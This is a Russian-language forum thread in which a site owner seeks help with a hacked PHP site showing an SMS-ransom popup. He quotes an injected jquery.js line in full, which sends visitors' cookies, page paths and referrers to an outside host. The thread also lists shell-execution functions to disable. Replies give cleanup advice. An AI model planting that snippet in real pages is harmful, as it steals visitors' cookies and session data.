Вирус на PHP

[Jon]

Недавно у клиента стала появляться заставка на сайте, о вводе СМС, для продолжения работы сайта. Я не как не мог поймать такое сообщение, покопавшись в логах действительно нашел, ссылается на адрес (что то такое, но ID другое) intitle.ocry.com/ptd1/sec.php?id=112313123 (там вируса нет)

Начал копать от куда ноги растут, так пока и не нашел, периодически появляется данное сообщение. Но в корне нашел чужой файл, я так понимаю это php sheel клиент что ли. Файл прилагаю в txt формате, осторожнее!

Вычитал только, что советуют отключить функции

exec,ini_get,ini_get_all,parse_ini_file,passthru,php_uname,popen,proc_open,shell_exec,show_source,system

1. Как не имея доступа к php.ini их можно отключить не подскажите?(
2. Кто нибудь сталкивался с таким?

p.s. если ктото хочет посмотреть как работает файл, пароль в простом md5, сейчас demo поставил.

 

[fixxxer]

ставлю сто баксов на code injection

грепай аксес логи

parse_ini_file

его-то за что?

 

[Absinthe]

ставлю сто баксов на code injection

Напрасно
К FTP скорее всего доступ слили.

 

[fixxxer]

Блин... Да, скорее всего ты прав. Забыл я уже давно, что бывают фтп и пароли...

 

[Jon]

Перерыл сейчас все файлы, на сервере нету не чего. Даже даты изменения не тронуты. Но в логах вижу обращения с главной страницы или с другой страницы прямо на этот скрипт.

Пример

109.167.205.2 - - [13/Aug/2012:23:52:49 +0400] "GET / HTTP/1.0" 200 15893 "http://intitle.ocry.com/ptd1/sec.php?id=28673699565410&mode=security&f=www.phpclub.ru%2F&row=full" "Mozilla/5.0 (Windows NT 6.0; rv:14.0) Gecko/20100101 Firefox/14.0.1"

 

[Вурдалак]

На даты изменения файлов можно не обращать внимания, потому что они легко подделываются с помощью touch.

 

[Jon]

Мастерхост еще логи только по запросу дает, или на след. день. офигенный хостер)

 

[Jon]

И чисто ради интереса, на хостинге, если я захожу через SSH, я могу нарыть php.ini или доступ закрыт должен быть?

 

[WMix]

часто бывает наоборот, ломают сервер, а дальше во всем виртуальным хостам разбрасывают файлики... в смысле твоя программа может быть нипричем...
2 раза уже было такое, а так как на одном хостере было несколько проджектов, приходилось чистить все

 

[Jon]

Нашел в jquery.js строку чужую.

var lnk='http://statistics.ns01.us/go.php?i=20&m=js&d='+ window.location.hostname+'&u='+encodeURIComponent(window.location.pathname)+ '&r='+encodeURIComponent(document.referrer.replace('http://',''))+'&c='+encodeURIComponent(document.cookie); var js=document.createElement('script'); js.type='text/javascript'; js.src=lnk; document.getElementsByTagName('head')[0].appendChild(js);

Соответственно в head добавляет что то вроде

http://statistics.ns01.us/go.php?i=20&m=js&d=fiddle.jshell.net&u=%2F_display%2F&r=jsfiddle.net%2F&c=__utmx%3D1

И получаем создание куки

function setCookie(name, value, expires, path, domain, secure) { var date=new Date(expires*1000); document.cookie = name + "=" + escape(value) + ((expires) ? "; expires=" + date.toGMTString() : "") + ((path) ? "; path=" + path : "") + ((domain) ? "; domain=" + domain : "") + ((secure) ? "; secure" : ""); }	 setCookie('__utmx','1',1346753389,'/','.fiddle.jshell.net');

Назвали __utmx типа это Google Analytics

Но как сообщение всплывает не пойму. Вызов куки не нашел на сайте.

 

[Jon]

Так что, есть идеи что делать?

 

[baev]

Нанять специалиста.

(Блин, действия элементарные:
— проверить свой компьютер на вирусы/трояны;
— убедиться, что используется нескомпрометированный ftp-клиент;
— поменять все пароли доступа;
— сравнить бэкапы за разные даты и выявить, наконец, изменения.)

 

[DYPA]

Так что, есть идеи что делать?

менять пароли от панели, заблокировать все ftp и ssh которые используются сейчас (либо сменить пароли)
выставить грамотно права на файлы, небось сейчас 0777 на всё
смотреть все исходники последовательно, смотреть логи ftp если есть, смотреть логи вебсервера если есть.
что за движок, последняя ли версия, есть ли паблик уязвимости под него?

lib.txt сильно напоминает старый r57shell

Но как сообщение всплывает не пойму.

проверить исходники на все вызовы base64_decode, eval, echo, print

 

[vierhein]

Как не имея доступа к php.ini их можно отключить не подскажите?(

Если у вашего провайдера не запрещено использование .htaccess то можно создать этот файл в корне moodle с соответствующими директивами.